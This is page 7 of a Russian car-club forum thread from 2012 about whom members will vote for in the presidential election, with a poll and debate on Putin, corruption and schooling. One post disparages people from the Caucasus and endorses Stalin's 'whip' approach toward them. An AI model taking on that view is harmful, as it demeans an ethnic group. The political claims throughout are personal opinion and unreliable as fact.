Результаты опроса: Кому отдадите голос на президентских выборах?

Голосовавшие
59. Вы ещё не голосовали в этом опросе
  • Владимир Путин

15 25.42%
  • Геннадий Зюганов

4 6.78%
  • Владимир Жириновский

3 5.08%
  • Сергей Миронов

2 3.39%
  • Михаил Прохоров

35 59.32%
+ Ответить в теме
Страница 7 из 21 ПерваяПервая ... 5 6 7 8 9 17 ... ПоследняяПоследняя
Показано с 61 по 70 из 205

Тема: Кому отдадите голос на президентских выборах?

GTI-Racing S@TURN will become famous soon enough Аватар для S@TURN
    Машина
    vr6 color concept - sold, а4 2.5tdi куатро!-sold, EOS - недопережитиай.
    Цитата Сообщение от GIII Посмотреть сообщение
    Ты поразил меня в саму пятку!
    Да будь он хоть проДоктор-зло деятель (о, Брейвик, например). Если он виновен, его должны судить и содить. А он мертв. Хорошо, может пример не очень корректен. Смысл, думаю, ясен.

Ты сторонник теорий заговора? Тогда теория жизни Гитлера после его смерти в этом смысле более интересна )))

Добавлено через 32 секунды

Не понял ни слова )))
    движение Молодая гвардия это дочка Единой России, если что) куртки клубные делали когда, часть сумму была спонсирована Молодой Гвардией. Так что мы с ними одно целое))))

Цитата Сообщение от Gizka Посмотреть сообщение
    Гена, ты о чем?))
    К предыдущему твоему посту:

Зачем детей ЗАСТАВЛЯТЬ учиться? Надо мотивировать... У нас в школах сейчас нет мотивации, всем на все положить... Программу поменяли так, что дети самого банального не знают и не потому, что они все дебилы, у них нет потенциала, а потому что стране шибко умные не нужны, нужна рабсила, а управлять этой рабсилой будут "хорошо" образованные дети чинушей.
    По инженерам: знаю как минимум двоих парней-инженеров, которые умеют пользоваться своим серым веществом. Видимо не там ищешь или же условия не подходят :)
    У меня мать всю жизнь работает в школе, средний уровень дибилизма растет с каждым годом, родители просто перестали воспитывать денег. Нянечки и прочее. Никому ничего не надо. Дети книжки в детстве не читают. Музыкой никто не занимается почти. Полная деградация. Так что это вина родителей в чистом виде.
    NON LIMITUS HOMICUS DOLBOEBICUS
    (нет предела человеческой глупости)

GTI-Racing GIII will become famous soon enough Аватар для GIII
    Машина
    skoda octavia scout
    Цитата Сообщение от inVENTOr Посмотреть сообщение
    ... и доказательств нет что в этом виновата Россия. Также как нет док-тв что 11сентября дело рук США а не алькаиды(что тоже есть Американская шахматная партия)
    ...
    Россия точно не виновата, что над ней почти 100 лет ставят опыты вивисекторы...
    Также нет документов, что взрывы в Москве дело рук "кровавой гебни", а не террористов - так я об этом и не говорю )))

Но давай вернемся к началу.
    Вот скажи, есть что-либо в устройстве нашей страны, что на данный момент тебя не устраивает?
    Skoda Octavia Scout APR StII: Intercooler APR, Carbonio Intake APR StI, Exhaust Downpipe APR, Bilstein B6, H&R Swaybars, brakes front S5, brakes rear S3, SRE Performance Clutch Kit, VWR Short Shifter

GTI-Racing S@TURN will become famous soon enough Аватар для S@TURN
    Машина
    vr6 color concept - sold, а4 2.5tdi куатро!-sold, EOS - недопережитиай.
    Цитата Сообщение от SMokED Посмотреть сообщение
    Мне вот интерестно а тут есть экономисты ну или рыночники (бумаги \ сырье)... быстро было бы объяснение ... прямо великий Пу поднял ВВП... заипался поднимать.
    вопрос не то что Пу дал народу а сколько не додал.
    Один только вопрос распила денег на кавказе и количество этых батыев чувствующих себя в москве как князьки которым позволено все (так им и правда все позволено) говорит за многое ... Но самое показательное , что он и не прекращает это останавливать а еще и грозит тем кто хочет "оторвать кавказ".
    Тьфу противно все это... правда .
    Веры нет никому, что самое ужасное что и вс эта "оппозиция" тоже не о чем. Но отсутствие голоса против всех считаю прямым нарушением конституционной морали...
    Надо проголосовать за путина ибо кроме него нет альтернатив... равносильно давайте проголоуем за андропова ибо альтернатив нет. Нет и небудет когда вертикаль власти выстроена на МВД и ЧК.
    Фил, отделим кавказ ---> дыра в обороне просто нереальная...нельзя.
    Кстати я по Андропову писал научку хорошую, хороший и жесткий мужик был. Нужен нам сейчас такой.
    NON LIMITUS HOMICUS DOLBOEBICUS
    (нет предела человеческой глупости)

Машина
    skoda octavia scout
    Цитата Сообщение от S@TURN Посмотреть сообщение
    ... средний уровень дибилизма растет с каждым годом, родители просто перестали воспитывать денег....
    ... оговорочка по Фрейду )))
    Skoda Octavia Scout APR StII: Intercooler APR, Carbonio Intake APR StI, Exhaust Downpipe APR, Bilstein B6, H&R Swaybars, brakes front S5, brakes rear S3, SRE Performance Clutch Kit, VWR Short Shifter

GTI-Racing Gizka is on a distinguished road Аватар для Gizka
    Машина
    семейный авто

Добавлено через 37 секунд

Мотивацию детям вкладывают их родители а не президент):):):):)
    Все в руках родителей а не президента, как воспитать, что дать, что отобрать во благо будущего. . .программа школы основана на том, что если тебе нужно дальше учиться, то пожалуйста учись, не хочешь, твоего образования достаточно чтобы работать в порту к примеру грузчиком:) или на шиномонтаже гайки крутить:)
    Эт я образно, возможно что то поменялось с 97 года, когда я школу окончил, не в курсе. Но образование детей, полностью лежит на плечах их родителей также как воспитание!

Добавлено через 6 минут
    Гена говорит о том, что в далеком 2006-2007 году, у нас были куртки клубные на которых красовалась надпись МОЛОДАЯ ГВАРДИЯ
    Так как на тот момент это был наш недолгий спонсор:)
    ЕГЭ - это чья заслуга? Учителей или родителей?)))
    С 97 МНОГО что поменялось, поверь и не в лучшую сторону. И так дети мало, что знали, теперь не будут знать НИЧЕГО. Про реформу образования слышал? Я сейчас не в курсе, чем все закончилось, но насколько помню, обсуждалось, что в школах будут обязательными предметами: Россия в мире, ОБЖ, физкультура. Остальные (напр. русский язык, математика, физика, химия, история) - предметы на выбор. Так и скажи, ЧЕМУ и КАК будут учиться дети с такой программой?
    P.S. Гена, мне помнится, ты где-то писал про свою маму и ее деятельность? надеюсь ничего не путаю (если путаю - извини). Она у тебя кажется в Малаховке в колледже работает. Так вот и скажи, много ли ОБЫЧНЫХ детей учатся в этой школе?)))
    Последний раз редактировалось Gizka; 09.02.2012 в 18:48.
    Жизнь — забавный подарок. Поначалу этот подарок переоценивают: думают, что им вручили вечную жизнь. После — ее недооценивают, находят никудышной, слишком короткой, почти готовы бросить ее. И наконец, сознают, что это был не подарок, жизнью просто дали попользоваться. И тогда ее пытаются ценить. (c)

SMokED
    Guest Аватар для SMokED
    Фил, отделим кавказ ---> дыра в обороне просто нереальная...нельзя.
    Кстати я по Андропову писал научку хорошую, хороший и жесткий мужик был. Нужен нам сейчас такой.
    Ген Да вопрос не в отделении !? Это все переноситься сразу на отделение! Людей заибало то что они творят и что им все сходит с рук. А происходит это потому что во всем этом пилении участвуют и гос власти РФ. Сталин быстро решил вопрос с кавказом ипо понимал , что поймуть только плеть.

Модератор inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice Аватар для inVENTOr
    Машина
    BMW 330D Соляра Power
    наверное я понял одно, что наша страна недовольна, но чем пока не решила.) ) )
    Это анекдот такой " Я так решила и точка! Но почему я так решила, я еще не решила") ) ) )
    А по существу да, в стране полно проблем разного рода, больницы, институты, промышленность, чиновники, коррупция, которая поглатила даже детсады и школы, не говоря о малом бизнесе, где у тебя готовы покупать товар если ты денег даш, но если мы сами не будем давать эти взятки тем же сотрудникам ГИБДД, УБЭП, СК, Суды, и т.д а в УК РФ пропишут статьи за взятку 20лет с конфискацией, а за дачу взятки 20лет, за угон авто 20лет, то возможно в нашем обществе станет чуть лучше, мы не будем сами нарушать, воровать, брать и давать взятки. . .Но я вно во всем этом не виноват призидент, кто меня сможет переубедить, тому шеколадка) ) ) )
    BMW 330D POWERED by Dizelboost :pepper:

Машина
    skoda octavia scout
    движение Молодая гвардия это дочка Единой России, если что) куртки клубные делали когда, часть сумму была спонсирована Молодой Гвардией. Так что мы с ними одно целое)))) ....
    О, нет. Я не Негоро, я Себастьян Перейро, как говорил классик.
    Что с того, что клубные куртки спонсировала Молодая гвардия? На куртках их символика? Я хожу уже 10 лет в Планету фитнесс, которая сейчас спонсирует Селигерские сборища. Это должно означать, что я разделяю взгряды Якеменко? )))

GTI-Racing Gizka is on a distinguished road Аватар для Gizka
    Машина
    семейный авто
    движение Молодая гвардия это дочка Единой России, если что) куртки клубные делали когда, часть сумму была спонсирована Молодой Гвардией. Так что мы с ними одно целое))))
    Фу-фу-фу, Гена... Ну не обобщай :))) Я надеюсь не все в клубе такие..
    Жизнь — забавный подарок. Поначалу этот подарок переоценивают: думают, что им вручили вечную жизнь. После — ее недооценивают, находят никудышной, слишком короткой, почти готовы бросить ее. И наконец, сознают, что это был не подарок, жизнью просто дали попользоваться. И тогда ее пытаются ценить. (c)

Машина
    skoda octavia scout
    ...
    А по существу да, в стране полно проблем разного рода, больницы, институты, промышленность, чиновники, коррупция, которая поглатила даже детсады и школы, не говоря о малом бизнесе, где у тебя готовы покупать товар если ты денег даш, ...
    А теперь, внимание, вопрос!
    Что мешало уважаемому всеми нами ВВП последние 12 лет бороться с названными явлениями? Почему эти явления за последние 12 лет не уменьшаются (мы верим в добрую волю ВВП, т.е. в то, что он с этим борется), а совсем наоборот? Что заставляет нас верить в то, что в последующие 6-12-18 лет ВВП, продолжая также неустанно бороться, все это таки поборет, а не наоборот?
    Кто мне убедительно ответит на эти вопросы - тому шоколадка )))

+ Ответить в теме
Страница 7 из 21 ПерваяПервая ... 5 6 7 8 9 17 ... ПоследняяПоследняя